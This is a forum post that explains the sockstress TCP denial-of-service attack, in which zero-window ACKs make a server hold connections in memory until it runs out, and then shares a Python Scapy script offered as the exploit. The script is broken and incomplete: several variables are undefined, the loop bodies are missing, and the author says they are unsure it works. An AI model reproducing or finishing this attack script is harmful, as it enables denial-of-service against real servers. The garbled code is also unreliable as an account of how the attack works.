here is how it works
syn -> (4k window)
<- syn+ack (32k window)
ack -> (0 window)
the 0 windows size basically says the clients buffer is full, but the server prepares and stores the connection in RAM, basically it waits untill the client is ready.
What sockstress does is it creates loads of connections like that causing the system to crash (RAM full), untill the plug is pulled.
here is a video with a good example of the sockstress exploit:
and a more detailed explanation.
please reffer to this wikipeida article for more info
Here is the code for the exploit it is not extremely powerful but you don't have to compile or have a vm or anything like that.Anyway hope you guys like this
I am not totaly sure if it works or not :/ as I can't get many cp/s
- Code: Select all
#sockstress exploit with scapy
#coded by fl0urite
#Not totaly sure if this works
from threading import Thread
from scapy.all import *
syn=i/TCP(sport=1500, dport=port, flags="S", seq=sequence)
ack=i/TCP(sport=1500, dport=port, flags="A", seq=sequence+1, ack=syn_ack, window=0)
for i in xrange(0,threads):
print "Could only start "+str(i)+" threads."
print "\033[1m\033[5;0;31m"+str(connections/time.clock())+" cps "+str(connections)+" total "
print "Press ^C to stop...\033[0m"
print "\033[5;0;31mWaiting for "+str(threads)+" to finish... \033[0m"